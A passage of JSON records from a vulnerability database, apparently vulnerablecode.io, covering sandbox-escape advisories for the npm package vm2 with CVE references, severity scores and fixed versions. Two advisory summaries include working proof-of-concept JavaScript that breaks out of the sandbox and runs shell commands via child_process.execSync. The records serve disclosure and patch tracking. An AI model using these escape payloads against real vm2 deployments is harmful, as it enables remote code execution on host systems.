nist.gov/vuln/detail/CVE-2026-44006"},{"reference_url":"https://github.com/advisories/GHSA-qcp4-v2jj-fjx8","reference_id":"GHSA-qcp4-v2jj-fjx8","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qcp4-v2jj-fjx8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44006","GHSA-qcp4-v2jj-fjx8"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ej5b-1m7b-hkf8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61341?format=json","vulnerability_id":"VCID-f2j1-dxbm-sfgc","summary":"vm2: vm2: Arbitrary code execution via SuppressedError sandbox escape","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26332.json","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26332.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26332","reference_id":"","reference_type":"","scores":[{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25152","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25266","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25249","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25199","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25142","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26332"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0"},{"reference_url":"https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f"},{"reference_url":"https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca"},{"reference_url":"https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d"},{"reference_url":"https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T19:06:32Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T19:06:32Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26332","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26332"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466508","reference_id":"2466508","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466508"},{"reference_url":"https://github.com/advisories/GHSA-55hx-c926-fr95","reference_id":"GHSA-55hx-c926-fr95","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-55hx-c926-fr95"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-26332","GHSA-55hx-c926-fr95"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f2j1-dxbm-sfgc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49851?format=json","vulnerability_id":"VCID-gqm5-bhj5-k3cf","summary":"vm2 has a Sandbox Escape\nIn vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code.\n\n```js\nconst { VM } = require(\"vm2\");\n\nconst code = `\nconst error = new Error();\nerror.name = Symbol();\nconst f = async () => error.stack;\nconst promise = f();\npromise.catch(e => {\nconst Error = e.constructor;\nconst Function = Error.constructor;\nconst f = new Function(\n\"process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })\"\n);\nf();\n});\n`;\n\nnew VM().run(code);\n```\n\nIn lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functions is `globalPromise` object.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22709","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.1728","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17184","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17165","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17245","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17284","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22709"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-27T21:42:17Z/"}],"url":"https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-27T21:42:17Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22709","reference_id":"CVE-2026-22709","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22709"},{"reference_url":"https://github.com/advisories/GHSA-99p7-6v5w-7xg8","reference_id":"GHSA-99p7-6v5w-7xg8","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-99p7-6v5w-7xg8"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8","reference_id":"GHSA-99p7-6v5w-7xg8","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-27T21:42:17Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73623?format=json","purl":"pkg:npm/vm2@3.10.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.10.2"}],"aliases":["CVE-2026-22709","GHSA-99p7-6v5w-7xg8"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gqm5-bhj5-k3cf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92107?format=json","vulnerability_id":"VCID-gqum-k4dn-fbe7","summary":"vm2 Access to Host Object Enables Sandbox Escape\n### Summary\n\nIt is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.\n\n### Details\n\nThere are various ways to use the host `Object`, to escape the sandbox, one example would be using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)`\n\n### PoC\n\n```js\nconst g = {}.__lookupGetter__;\nconst a = Buffer.apply;\nconst p = a.apply(g, [Buffer, ['__proto__']]);\nconst o = p.call(p.call(a));\nconst HObject = o.constructor;\nsym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);\n\nconst obj = {\n\t[sym]: (depth, opt, inspect) => {\n\t\tinspect.constructor(\"return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})\")();\n\t},\n\tvalueOf: undefined,\n\tconstructor: undefined,\n};\n\nWebAssembly.compileStreaming(obj).catch(() => {});\n```\n\n### Impact\n\nSandbox Escape -> RCE","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43997","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.0639","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06352","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06345","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06408","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06398","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43997"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-13T18:39:53Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43997","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43997"},{"reference_url":"https://github.com/advisories/GHSA-47x8-96vw-5wg6","reference_id":"GHSA-47x8-96vw-5wg6","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-47x8-96vw-5wg6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-43997","GHSA-47x8-96vw-5wg6"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gqum-k4dn-fbe7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44966?format=json","vulnerability_id":"VCID-hhxv-v932-cuf7","summary":"Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')\nvm2 is a sandbox that can run untrusted code with allow listed Node's built-in modules. There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context. This vulnerability was patched in the release of version `3.9.17` of `vm2`. There are no known workarounds for this vulnerability. Users are advised to upgrade.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-30547.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-30547.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30547","reference_id":"","reference_type":"","scores":[{"value":"0.83683","scoring_system":"epss","scoring_elements":"0.99307","published_at":"2026-06-09T12:55:00Z"},{"value":"0.84615","scoring_system":"epss","scoring_elements":"0.99349","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30547"},{"reference_url":"https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-05T20:29:43Z/"}],"url":"https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/4b22e87b102d97d45d112a0931dba1aef7eea049","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-05T20:29:43Z/"}],"url":"https://github.com/patriksimek/vm2/commit/4b22e87b102d97d45d112a0931dba1aef7eea049"},{"reference_url":"https://github.com/patriksimek/vm2/commit/f3db4dee4d76b19869df05ba7880d638a880edd5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-05T20:29:43Z/"}],"url":"https://github.com/patriksimek/vm2/commit/f3db4dee4d76b19869df05ba7880d638a880edd5"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/3.9.17","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/3.9.17"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2187608","reference_id":"2187608","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2187608"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30547","reference_id":"CVE-2023-30547","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30547"},{"reference_url":"https://github.com/advisories/GHSA-ch3r-j5x3-6q2m","reference_id":"GHSA-ch3r-j5x3-6q2m","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ch3r-j5x3-6q2m"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-ch3r-j5x3-6q2m","reference_id":"GHSA-ch3r-j5x3-6q2m","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-02-05T20:29:43Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-ch3r-j5x3-6q2m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64745?format=json","purl":"pkg:npm/vm2@3.9.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.17"}],"aliases":["CVE-2023-30547","GHSA-ch3r-j5x3-6q2m"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hhxv-v932-cuf7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/101763?format=json","vulnerability_id":"VCID-jv3n-721k-z3h7","summary":"vm2: Sandbox Escape in vm2","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-36067.json","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-36067.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36067","reference_id":"","reference_type":"","scores":[{"value":"0.84468","scoring_system":"epss","scoring_elements":"0.99343","published_at":"2026-06-09T12:55:00Z"},{"value":"0.84468","scoring_system":"epss","scoring_elements":"0.99341","published_at":"2026-06-04T12:55:00Z"},{"value":"0.84468","scoring_system":"epss","scoring_elements":"0.99342","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36067"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71"},{"reference_url":"https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164"},{"reference_url":"https://github.com/patriksimek/vm2/issues/467","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://github.com/patriksimek/vm2/issues/467"},{"reference_url":"https://github.com/patriksimek/vm2/